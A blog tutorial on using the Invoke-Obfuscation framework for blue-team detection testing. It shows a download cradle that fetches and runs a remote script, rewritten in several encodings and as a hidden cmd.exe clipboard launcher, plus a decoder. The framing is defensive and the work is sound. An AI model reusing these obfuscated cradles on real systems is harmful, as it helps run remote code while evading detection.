Invoke-Obfuscation

While testing PowerShell commands against Windows Defender Advanced Threat Protection (WDATP) and preparing for some webinars I am doing in April and May, I spent some time using the framework "Invoke-Obfuscation". I thought it might be useful to walk through how to use it and what it can do.

What is "Invoke-Obfuscation"?
Attackers and commodity malware have started using very basic obfuscation techniques to hide the real command from anything that only inspects the command-line arguments of powershell.exe. Daniel Bohannon developed this tool to help Blue Teams simulate obfuscated commands, based on what he knows to be syntactically possible in PowerShell 2.0 to 5.0, so that they can test whether their own tooling detects these techniques.

First, to use it, clone or download the following GitHub repository.

https://github.com/danielbohannon/Invoke-Obfuscation

Change to the folder into which you cloned or extracted the project. Next, load the framework with "Import-Module" (the module manifest is Invoke-Obfuscation.psd1).

Depending on your PowerShell security settings you may need to change the "Execution Policy" (prefer -Scope Process, so the change does not outlive the session), and then accept each script as it loads. Once done, type "Invoke-Obfuscation" and press "Enter".

Once it has finished loading you should see the tool's banner and its interactive menu.
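The same setup, and the scripted form of it, as a PowerShell transcript. This is an added example, not code from the Invoke-Obfuscation project; the -ScriptBlock, -Command and -Quiet parameters and the ENCODING\1 menu path follow the project README at the time, so confirm them with Get-Help Invoke-Obfuscation in the copy you cloned.

```powershell
# Added example, not code from the Invoke-Obfuscation project. Loads the module for
# this process only and shows the scripted form of the ENCODING step that the
# walk-through performs through the menu. Parameter names and the 'ENCODING\1' menu
# path follow the project README; confirm them with Get-Help Invoke-Obfuscation.
Set-Location .\Invoke-Obfuscation                           # the cloned repository
Get-ChildItem -Recurse -File | Unblock-File                 # drop mark-of-the-web if it came as a zip
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process  # this session only, nothing machine-wide
Import-Module .\Invoke-Obfuscation.psd1

# Interactive menu, as in the walk-through:
Invoke-Obfuscation

# Scripted: apply ENCODING option 1 (ASCII) to a script block and print only the result,
# which is what you want when generating many variants to replay against a sensor.
Invoke-Obfuscation -ScriptBlock { Write-Host 'obfuscation test' } -Command 'ENCODING\1' -Quiet
```

Scoping the execution policy to the process is the habit worth keeping: the tool needs it, the machine does not.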

The tool is simple to use; besides the obfuscation commands, the menu offers a test option and tutorials. Now that it is loaded, we need to decide which PowerShell command we want to obfuscate. For this example we use a classic download cradle: a one-liner that fetches a script over HTTP and runs it with Invoke-Expression. The script behind the shortened URL simply writes a message, but the shape is the one a real dropper uses, which makes it a sensible sample to test detection against.

Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http://bit.ly/2GfFXuD')

Now we have this, let's use "Invoke-Obfuscation" to make it harder to understand. First, type "SET SCRIPTBLOCK" followed by the command above ("SET SCRIPTPATH" takes the path to a .ps1 file instead).

Press "Enter". Next we choose the encoding to apply to the script block: type "ENCODING", press "Enter", and pick one of the eight encoding options.

Here is the command from above using each option. Two things are common to all of them. First, the character values are decoded and then handed to Invoke-Expression, whose name is never written out: each sample assembles "iex" from characters of a variable that always exists, such as $PSHOME ($PSHOME[4] and $PSHOME[34] are "i" and "e"), $ShellId ("Microsoft.PowerShell", indices 1 and 13), $VerbosePreference ("SilentlyContinue", indices 1 and 3) or the variable matched by "*Mdr*" (MaximumDriveCount, indices 3, 11 and 2). Second, the values 8216 and 8217 (hex 2018/2019, octal 20030/20031, binary 10000000011000/10000000011001, or 8263/8262 once XORed with 0x5f) appear because the command was pasted with curly quotes around the URL; PowerShell accepts U+2018 and U+2019 as string delimiters, so the decoded command still runs.

ASCII
. ( $pShoMe[4]+$PsHOmE[34]+'x')( -joIn ('73<110-118{111I107%101<45m69<120e112%114-101-115{115{105e111<110e32_40H78%101I119_45<79m98q106_101%99e116m32q83I121-115<116q101<109_46%78-101_116_46{87%101I98{67%108q105q101I110{116q41-46<68e111{119-110_108I111I97I100e83q116-114e105-110{103_40m8216m104m116q116-112%58-47<47-98m105I116I46<108H121%47%50e71{102_70H88H117%68m8217I41'.spLit('e%_<q{m-IH' )| % { ( [InT]$_ -as[cHAR]) }))

HEX
&((GET-VARiaBle '*Mdr*').nAME[3,11,2]-JoIN'') ( "$( seT-varIAble 'oFs' '')" +[sTriNg]( '49&6es76X6fK6bz65}2dX45X78:70X72_65:73s73s69:6f}6es20z28_4e:65X77K2d&4f:62K6a:65_63K74_20z53K79s73X74:65}6dX2e&4ez65}74z2e&57s65K62_43}6c_69z65_6ez74X29K2e_44}6fz77X6e&6cK6fX61:64}53z74s72:69s6e:67}28s2018}68z74&74K70z3aX2f}2f&62:69}74s2es6c:79s2fK32&47z66&46K58K75_44s2019:29'-sPliT'X'-SPlIT '_'-sPlIT'z'-SpLIt's' -splIT':'-SPLit'}' -SPLIT '&' -SPlit 'K'| ForEACh{( [CHAR] ( [cOnVErT]::TOINt16(( $_.TostRInG()) ,16 ) ))} )+"$( SET-iTEM 'VaRiABlE:OFs' ' ' ) ")

Octal
((111,156, 166, 157, 153,145,55, 105 ,170 ,160,162 , 145 , 163 , 163,151, 157,156 , 40, 50 , 116 , 145 ,167, 55, 117 , 142,152, 145 , 143,164,40 ,123 ,171, 163,164 ,145 , 155,56,116 , 145 ,164, 56 ,127 ,145 ,142,103 , 154, 151,145 , 156 ,164, 51 , 56,104 , 157 ,167 ,156,154 , 157,141, 144,123 , 164 ,162 , 151, 156 , 147 ,50 , 20030 ,150, 164, 164 ,160,72,57 , 57 , 142 ,151 ,164 ,56, 154, 171,57,62,107 ,146,106 ,130, 165 , 104 ,20031 , 51) | fOreACh{( [conVERT]::toInt16(([STRing]$_), 8 ) -as[cHAr]) })-Join'' | &( ([stRing]$verBOsEpREfEreNce)[1,3]+'X'-join'')

Binary
-JOin( '1001001_1101110I1110110S1101111>1101011_1100101!101101e1000101I1111000c1110000_1110010S1100101>1110011I1110011}1101001!1101111e1101110}100000k101000e1001110S1100101}1110111@101101>1001111I1100010I1101010!1100101_1100011e1110100k100000}1010011k1111001k1110011!1110100k1100101I1101101@101110S1001110!1100101@1110100@101110c1010111_1100101>1100010}1000011S1101100@1101001!1100101e1101110e1110100k101001>101110!1000100e1101111I1110111S1101110k1101100c1101111e1100001c1100100I1010011e1110100S1110010e1101001>1101110@1100111_101000e10000000011000}1101000e1110100I1110100_1110000@111010@101111k101111>1100010c1101001c1110100>101110e1101100c1111001c101111k110010>1000111S1100110}1000110_1011000>1110101k1000100e10000000011001_101001'.spLIT('_Ik!@>Sce}')|fOREACh{ ([coNVeRT]::toInt16(( [STRIng]$_), 2 ) -as[cHaR])} ) | &( ([sTrING]$VERBOSeprefEreNCE)[1,3]+'X'-joiN'')

SecureString (AES)
([RunTimE.InterOpSeRvIcEs.marsHaL]::ptrtoStRinguni( [RUNTIMe.interOPServices.MARsHAL]::sECuREstrINGtoglobAlaLLOCUNIcODE( $('76492d1116743f0423413b16050a5345MgB8ADUAQwBpAEwATwBiAGQAUQBEAEEAbQBJAEUAdgBSAFYANQBEAGQAeQB3AGcAPQA9AHwAMgBjAGIANgAxAGUAZAAwADMAYgA3ADgAMQBiADYANQA1AGEANQA1AGUAOAAwAGUAZQAzAGEAYwAzADkANwBiADUAYwA0ADMANwA0ADUANgA4AGYAMABjAGEAMwAwAGUAMgA2ADcAZQAzADIAMgBjADEAYgBiAGYANQBhADIAZAA3ADgAZAAxADgANgBjAGMANQAwAGIANAA5AGMAMABmAGEANQA1AGEANgBmAGYAMQA5ADQANQBjADUANABjADIAMAAyAGEANAAwADEANwA4AGIAZAA2AGMANABhADAANABkADAAMwBiADAANwAyAGEANQAzAGEAZQAwADcAMABlADgANwBlADUAZAA4ADEANgA0ADAAYwAxADEAZgBhADYAOQAwAGQAMQA1AGQANgA2ADMAYQBlADcAMwAwADMAYQBiADUAMAAwADIAYwBhADAAZABiADcAZQBjAGIAMwAwADAAZgBlAGYAOQAxADMAYwBjADUAZgAwAGMAMwBiAGEAYgBlADMAZgA3ADUAZAA2AGIAYwA1AGYAMwBhADMAMAA2AGIAMQBhAGIAMgBlADkAZABlAGIAMQA5ADgAMQBmADkAMABkADcAZQA2ADYANQBmAGUANQBhADYAYgBhADYAMAA2AGQAMAA1ADYAZAA4AGUANgAyADYANQBkAGIANgAzAGMAYQA1AGMANgBiAGQAOABmADAAYQAwADIANgBhADYAYwA2ADkAOABlADQANwBkAGUANgAzAGYANwA0ADYAZgA5ADcANgBhAGYANAAxAGIAMwA4AGEANABkAGMAZgBiADMAOAAwADQAZABiADIANAA2ADIANgBmAGMAMwAwAGIAZABkADMANgBjADQAMQBhADUAZABiADcAYQA5ADAAZgA3ADMAZgBmAGMAOAA3ADgAYwA0AGEANgBkADcAOABmAGQAMwBlAGEAYgBkADAAZABkADkAYgBlADUAMQAwAGMAMwBhAGIAOAAzAGQAOQAzADgANgAwADAAYQA2ADYA'|CoNvertTO-SecUREStRIng -KeY (193..224)) ) )) |INvOKe-EXPrESsion

BXOR
. ( $SHeLLID[1]+$shEllID[13]+'x') ( (( 22, 49,41 , 48,52, 58,114, 26, 39, 47 ,45, 58, 44, 44,54, 48 ,49,127,119,17 , 58, 40,114,16 , 61 ,53 ,58, 60 , 43, 127 , 12, 38,44,43 , 58,50 ,113,17,58, 43, 113 , 8, 58 , 61 ,28 ,51, 54 , 58,49 ,43 , 118, 113,27 ,48, 40,49 ,51 ,48, 62,59 , 12, 43 , 45 ,54 , 49, 56,119 ,8263, 55 , 43, 43,47,101 , 112 , 112 ,61 ,54,43,113 , 51 , 38,112 ,109, 24, 57 ,25 , 7 , 42, 27 ,8262, 118 )| %{ [CHAR] ($_ -bXoR'0x5f')})-joIn'')

Special Characters
${!}=+ $();${+)}=${!}; ${=/} = ++ ${!} ; ${"./} =( ${!} =${!} +${=/}) ;${!*} =( ${!} = ${!} +${=/}) ; ${]!#}=(${!} =${!}+ ${=/} ); ${$# }=( ${!}=${!}+ ${=/} ); ${~$}=(${!} = ${!}+${=/} ) ; ${]+}=(${!}=${!} +${=/} );${+~}=( ${!}= ${!} + ${=/}) ; ${@} =(${!}=${!} +${=/}) ;${+}="["+ "$(@{} )"[${]+} ] +"$(@{})"["${=/}${@}"]+"$( @{ })"[ "${"./}${+)}" ] + "$? "[${=/} ] + "]"; ${!}= "".("$( @{ } ) "[ "${=/}" +"${]!#}"]+ "$( @{ } )"[ "${=/}"+ "${~$}" ]+"$(@{ })"[ ${+)} ]+ "$( @{} ) "[${]!#} ]+"$?"[ ${=/}] + "$( @{} ) "[ ${!*}]); ${!}= "$(@{} )"["${=/}${]!#}" ] +"$( @{ } ) "[${]!#} ]+ "${!}"["${"./}${]+}" ];"${!} ( ${+}${]+}${!*}+${+}${=/}${=/}${+)}+ ${+}${=/}${=/}${+~} +${+}${=/}${=/}${=/} + ${+}${=/}${+)}${]+}+ ${+}${=/}${+)}${=/}+${+}${]!#}${$# }+${+}${~$}${@} + ${+}${=/}${"./}${+)} + ${+}${=/}${=/}${"./} + ${+}${=/}${=/}${]!#} + ${+}${=/}${+)}${=/} +${+}${=/}${=/}${$# } + ${+}${=/}${=/}${$# }+ ${+}${=/}${+)}${$# } + ${+}${=/}${=/}${=/}+ ${+}${=/}${=/}${+)}+ ${+}${!*}${"./} + ${+}${]!#}${+)} + ${+}${]+}${+~} +${+}${=/}${+)}${=/} +${+}${=/}${=/}${@}+${+}${]!#}${$# } +${+}${]+}${@} + ${+}${@}${+~} + ${+}${=/}${+)}${~$} + ${+}${=/}${+)}${=/}+${+}${@}${@} + ${+}${=/}${=/}${~$} +${+}${!*}${"./}+ ${+}${+~}${!*}+${+}${=/}${"./}${=/} + ${+}${=/}${=/}${$# }+${+}${=/}${=/}${~$} +${+}${=/}${+)}${=/}+${+}${=/}${+)}${@}+ ${+}${]!#}${~$}+${+}${]+}${+~} +${+}${=/}${+)}${=/} +${+}${=/}${=/}${~$}+${+}${]!#}${~$} + ${+}${+~}${]+} +${+}${=/}${+)}${=/}+ ${+}${@}${+~}+ ${+}${~$}${]+} +${+}${=/}${+)}${+~}+ ${+}${=/}${+)}${$# } +${+}${=/}${+)}${=/} +${+}${=/}${=/}${+)} +${+}${=/}${=/}${~$}+${+}${]!#}${=/} + ${+}${]!#}${~$} + ${+}${~$}${+~}+ ${+}${=/}${=/}${=/}+${+}${=/}${=/}${@}+ ${+}${=/}${=/}${+)} +${+}${=/}${+)}${+~}+ ${+}${=/}${=/}${=/}+${+}${@}${]+}+${+}${=/}${+)}${+)} +${+}${+~}${!*} +${+}${=/}${=/}${~$}+${+}${=/}${=/}${]!#} + ${+}${=/}${+)}${$# } + ${+}${=/}${=/}${+)} + ${+}${=/}${+)}${!*} + ${+}${]!#}${+)} +${+}${+~}${"./}${=/}${~$} + ${+}${=/}${+)}${]!#}+ ${+}${=/}${=/}${~$} + ${+}${=/}${=/}${~$}+${+}${=/}${=/}${"./}+${+}${$# }${+~} +${+}${]!#}${]+} +${+}${]!#}${]+} +${+}${@}${+~}+${+}${=/}${+)}${$# } +${+}${=/}${=/}${~$} + ${+}${]!#}${~$}+ ${+}${=/}${+)}${+~}+${+}${=/}${"./}${=/} + ${+}${]!#}${]+}+${+}${$# }${+)} + ${+}${]+}${=/} + ${+}${=/}${+)}${"./} + ${+}${]+}${+)} +${+}${+~}${+~} + ${+}${=/}${=/}${]+} +${+}${~$}${+~}+ ${+}${+~}${"./}${=/}${]+}+ ${+}${]!#}${=/} ) "| &${!}

Whitespace
' '|FOREacH{$bFpejQ= $_ -ispLit ' '| FOREacH { ' ' ; $_ -ispLit ' ' |FOREacH { $_.lENGTh -1}};&( $pShOMe[4]+$pShome[34]+'X')( -joIN (((-joIN( $bFpejQ[0..($bFpejQ.lENGTh-1)]) ).triM( ' ' ).SpliT(' ' ) | FOREacH{ ([INT] $_-aS[cHaR])}))) }

I just like looking at them once they are encoded. The whitespace sample is the one you cannot copy from this page: its payload is made of runs of spaces and tabs whose lengths encode the characters, and a web page collapses those runs. Another option is to use "STRING" instead. You can then choose from three options: concatenate, reorder or reverse.

Choosing the third option, reverse, changes the command to the following. The variable at the front holds the concatenated command backwards; indexing its value with [-1..-length] reverses it again, $OFS is cleared first so the [string] cast joins the characters without spaces, and the result is piped to Invoke-Expression spelled out from $ShellId:

$LwFhTO =" ) )')'+'’D'+'u'+'XF'+'fG2/yl'+'.tib//:p'+'tth‘(gnir'+'tSda'+'o'+'lnwoD.)tn'+'ei'+'lCbeW'+'.teN.'+'metsyS tcejbO-'+'w'+'e'+'N('+' '+'noi'+'s'+'serp'+'xE'+'-e'+'kov'+'nI'(( )''nIOJ-'x'+]3,1[)(GNirTsot.eCNEreFERPEsobREv$ (&" ; " $( Sv 'OfS' '') " + [stRING] ( ( Gci ('vArIa'+'b'+'lE:lwFHTO') ).VaLue[ -1..-(( Gci ('vArIa'+'b'+'lE:lwFHTO') ).VaLue.lENgTH ) ])+"$(sET-ITem 'VariAbLE:OFS' ' ' )" |& ( $sHEllId[1]+$ShElliD[13]+'x')
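To make the ENCODING samples and the STRING reverse above easier to reason about, here is a small re-implementation of the same schemes, together with the check an analyst actually wants: recover the plaintext by evaluating only the decoder. This is an added example, not code from Invoke-Obfuscation or from the author; the function names are mine, the delimiters and casing are fixed rather than randomised, and the Invoke-Expression call that the real samples append is deliberately left out.

```powershell
# Added example, not code from Invoke-Obfuscation: a minimal re-implementation of the
# numeric ENCODING schemes and of the STRING reverse shown above, with a round-trip
# check that evaluates only the decoder. The tool randomises delimiters, casing and
# whitespace and hides the Invoke-Expression call; both are left out here on purpose.
function ConvertTo-EncodedPayload {
    param(
        [Parameter(Mandatory)] [string] $Command,
        [Parameter(Mandatory)]
        [ValidateSet('ASCII', 'Hex', 'Octal', 'Binary', 'BXOR', 'Reverse')]
        [string] $Encoding,
        [int] $XorKey = 0x5f                      # the key the BXOR sample above uses
    )
    # One code point per character. Curly quotes (U+2018/U+2019) come out as 8216/8217,
    # exactly as they do in the samples above.
    $codes = [int[]][char[]] $Command

    switch ($Encoding) {
        'ASCII'   { $data = $codes -join '-'
                    "('$data'.Split('-') | ForEach-Object { [char][int] `$_ }) -join ''" }
        'Hex'     { $data = ($codes | ForEach-Object { $_.ToString('x') }) -join ':'
                    "('$data'.Split(':') | ForEach-Object { [char][convert]::ToInt16(`$_, 16) }) -join ''" }
        'Octal'   { $data = ($codes | ForEach-Object { [convert]::ToString($_, 8) }) -join ','
                    "(($data) | ForEach-Object { [char][convert]::ToInt16([string]`$_, 8) }) -join ''" }
        'Binary'  { $data = ($codes | ForEach-Object { [convert]::ToString($_, 2) }) -join '_'
                    "('$data'.Split('_') | ForEach-Object { [char][convert]::ToInt16(`$_, 2) }) -join ''" }
        'BXOR'    { $data = ($codes | ForEach-Object { $_ -bxor $XorKey }) -join ','
                    "(($data) | ForEach-Object { [char](`$_ -bxor $XorKey) }) -join ''" }
        'Reverse' { # same trick as the STRING reverse sample: store the text backwards and
                    # index it from the end; a literal ' inside the text is doubled
                    $reversed = (-join ($Command[-1..-($Command.Length)])).Replace("'", "''")
                    "-join ('$reversed'[-1..-$($Command.Length)])" }
    }
}

# Round-trip each scheme by evaluating ONLY the decoder expression. The real samples
# end in "| & (iex)" or "| Invoke-Expression"; dropping that tail is how you read a
# captured command without running whatever it downloads.
function Test-EncodedPayload {
    param([Parameter(Mandatory)] [string] $Command)
    foreach ($scheme in 'ASCII', 'Hex', 'Octal', 'Binary', 'BXOR', 'Reverse') {
        $decoder   = ConvertTo-EncodedPayload -Command $Command -Encoding $scheme
        $recovered = & ([scriptblock]::Create($decoder))
        [pscustomobject]@{
            Encoding   = $scheme
            RoundTrips = ($recovered -eq $Command)
            Decoder    = $decoder.Substring(0, [Math]::Min(60, $decoder.Length)) + '...'
        }
    }
}

# The cradle from this post, constructed here with the curly quotes the author pasted.
$cradle = 'Invoke-Expression (New-Object System.Net.WebClient).DownloadString(' +
          [char]0x2018 + 'http://bit.ly/2GfFXuD' + [char]0x2019 + ')'

Test-EncodedPayload -Command $cradle | Format-Table -AutoSize
ConvertTo-EncodedPayload -Command $cradle -Encoding BXOR   # compare with the BXOR sample above
```

Every row should report RoundTrips = True. When triaging a real capture, do the same thing by hand: keep the decoding pipeline, delete the trailing invocation, and you get the plaintext without touching the network.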

You can also set the "LAUNCHER" that will run the obfuscated command. By default the result is a PowerShell command that has to be run inside an existing PowerShell session; a "LAUNCHER" wraps it in a one-liner that starts powershell.exe from somewhere else, for example from cmd.exe. The "CLIP+" variant echoes the payload into the clipboard and has powershell.exe read and execute it from there, so the cradle itself never appears on the powershell.exe command line.

If you choose "CLIP+", you are then asked which powershell.exe execution flags should be applied (for example -NoProfile, -NonInteractive or -WindowStyle Hidden), entered as a string of digits; "0" applies none.

For now, I am going to choose "0". The command is then changed to the following. Note that the launcher adds -sta on its own, because the .NET clipboard classes require a single-threaded apartment, and that the tripled carets are cmd.exe escaping: the left-hand side of a cmd.exe pipe is parsed twice, so each "|" inside the echo needs a caret that itself survives the first pass:

cMd.exE /C"ECHo -JOIN( (49, '6e', 76 , '6f' , '6b' , 65,'2d',45 ,78,70, 72 , 65 , 73, 73,69,'6f' ,'6e',20,28 ,'4e', 65 , 77 ,'2d' , '4f', 62, '6a' ,65,63 ,74, 20 ,53, 79 ,73,74, 65 ,'6d', '2e' , '4e', 65 , 74 ,'2e', 57 , 65, 62 , 43 ,'6c' ,69 ,65 , '6e' ,74, 29, '2e',44 , '6f' , 77 , '6e' , '6c' ,'6f' ,61 ,64 ,53, 74, 72, 69 , '6e' ,67, 28 ,2018, 68, 74,74 , 70 ,'3a' ,'2f','2f' , 62 ,69 ,74,'2e' ,'6c' , 79, '2f', 32 ,47, 66,46, 58 ,75 , 44 ,2019 ,29 ) ^^^| foreaCH-OBJeCt{( [ChAr] ( [CoNverT]::toiNt16(($_.TOSTrInG()) ,16) ))}) ^^^|^^^&( $VeRBosePReFErENce.ToStrInG()[1,3]+'x'-joIN'')|Clip && powERShEll -sT ${l`dfo} = [System.Reflection.Assembly]::(\"{2}{1}{0}{3}\" -f 'i',( \"{1}{2}{0}\"-f 'art','With','P' ),(\"{1}{0}\" -f'oad','L' ),( \"{1}{2}{0}\" -f'me','al','Na' ) ).\"inv`OKe\"(( \"{1}{4}{2}{3}{0}\" -f's','Syst','m','.Windows.Form','e' ) ) ; ( ^& ( 'Gv' ) ( \"{3}{2}{0}{4}{1}\"-f'O','t','nC','eXeCuTio','nteX' ) -valuEoNly).\"invokec`O`mM`AND\".\"inVOk`es`CRI`PT\"( ( [wINdowS.forms.CLiPBOArd]::( \"{0}{2}{1}\"-f 'gE','XT','ttE').\"i`NVoKE\"() ) ) ; [Windows.Forms.Clipboard]::(\"{1}{0}{2}\"-f 'tT','Se','ext').\"In`VOKe\"(' ' )"

As you can see, it looks very different from the command we started with: the powershell.exe half loads System.Windows.Forms by a format-string-assembled name, reads the clipboard through $ExecutionContext.InvokeCommand.InvokeScript, and then clears the clipboard. Once you have built the command the way you want it, you can execute it locally with "TEST". If you have applied a "LAUNCHER" such as "CMD", then "TEST" no longer applies, because the result is a cmd.exe command line rather than PowerShell.

Taking the above command and running it in a "Command Prompt" executes the PowerShell exactly as the original did.

Executed

As you can see, obfuscating PowerShell with "Invoke-Obfuscation" is simple and very powerful. That is the point for defenders: a detection that looks for the literal "Invoke-Expression" or "DownloadString" on the powershell.exe command line misses every variant above, whereas PowerShell 5 Script Block Logging (event 4104) records the code each layer actually hands to the engine, so the de-obfuscated cradle still shows up there. Run a few of these through your own logging and alerting and see which ones you would actually have caught.

Liam Cleary

Liam began his career as a Trainer of all things computer related. He quickly realized that programming, breaking, and hacking was a lot more fun. He spent the next few years working within core infrastructure and security services until he found SharePoint. He is the founder and owner of SharePlicity, a consulting company that focuses on all areas of Technology. His role within SharePlicity is to help organizations implement technology that will enhance internal and external collaboration, document and records management, automate business processes and of course security controls and protection. Liam also serves as the Product Owner for Security at Rencore, where he is helping to develop offerings that help organizations further understand and mitigate security and compliance risks within SharePoint and Office 365 customizations. His core focus is to identify, control and protect customizations, whether they are full-fledged customizations or out-of-the-box Office 365 functionality. He is also a twelve-time Microsoft MVP focusing on Architecture but also crosses the boundary into Development. His specialty over the past few years has been security in SharePoint and its surrounding platforms. He can often be found at user groups or conferences speaking, offering advice, spending time in the community, teaching his kids how to code, Raspberry Pi programming, hacking the planet or building Lego robots.
